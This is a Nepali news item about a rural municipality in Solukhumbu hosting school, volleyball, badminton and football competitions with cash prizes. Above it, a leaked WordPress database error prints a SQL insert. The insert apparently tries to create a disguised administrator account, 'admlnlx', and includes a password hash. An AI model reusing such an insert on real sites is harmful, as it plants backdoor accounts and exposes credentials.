WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYNfrU7sWpEAMZOme5dxlpdUXy7DK2.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 08:41:22', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु ।
माप्य दुधकोशी गाउँपालिकाले राष्ट्रपति रनिङ सिल्डसँगै विभिन्न खेलकुद प्रतियोगिताको आयोजना गर्ने भएको छ ।
आगामी पौष २७ गतेबाट माग १ गतेसम्म गाउपालिकाले निमार्ण गरेको खेलकुद मैदान कोर्कुमा उक्त कार्यक्रम आयोजना गरेको हो ।
कार्यक्रममा माप्य दुधकोशी गाउँपालिकामा रहेका विद्यालयको लागि अन्तर विद्यालय स्तरीय राष्ट्रपति रनिङ शिल्ड, माप्य दुधकोशी गाउँपालिका वडा स्तरीय खुल्ला महिला तथा पुरुष भलिब प्रतियोगिता, गाउँपालिका स्तरीय पुरुष एकल ब्याडमिन्टन प्रतियोगिता र सोलुखुम्बु जिल्ला स्तरीय अन्तर गाउँपालिका÷नगरपालिका फुटबल प्रतियोगिता संचालन हुने माप्य दुधकोशी गाँउपालिकाले जनाएको छ ।
राष्ट्रपति रनिङ शिल्ड प्रतियोगितामा प्रथम, द्धितीय र तृतीय स्थान हासिल गर्ने टिमले ट्रफी, मेडल तथा प्रमाणपत्रको साथमा क्रमशः नगद रु. १० हजार, रु. ८ हजार, रु. ५ हजार प्राप्त गर्नेछन् ।
प्रतियोगितामा महिला÷पुरुष भलिबलमा प्रथम, द्धितीय र तृतीय टिमले ट्रफी, मेडल र प्रमाणपत्रको साथमा क्रमशः नगद रु. ३० हजार, रु.२० हजार, रु.१५ हजार र सान्त्वना हुनेले नगद रु.८ हजार प्राप्त गर्नेछन् ।
पुरुष एकल ब्याडमिन्टन प्रतियोगितामा प्रथम, द्धितीय र तृतीय हुने टिमले प्रमाणपत्र, मेडलको साथमा क्रमशः नगद रु ७ हजार, रु.५ हजार र रु.४ हजार प्राप्त गर्नेछन् । पुरुष फुटबलको बिजेता टिमले ट्रफी, मेडल र प्रमाणपत्रको साथमा क्रमश रु.५० हजार, रु.३० हजार र रु.१५ हजार राषि रहेको छ ।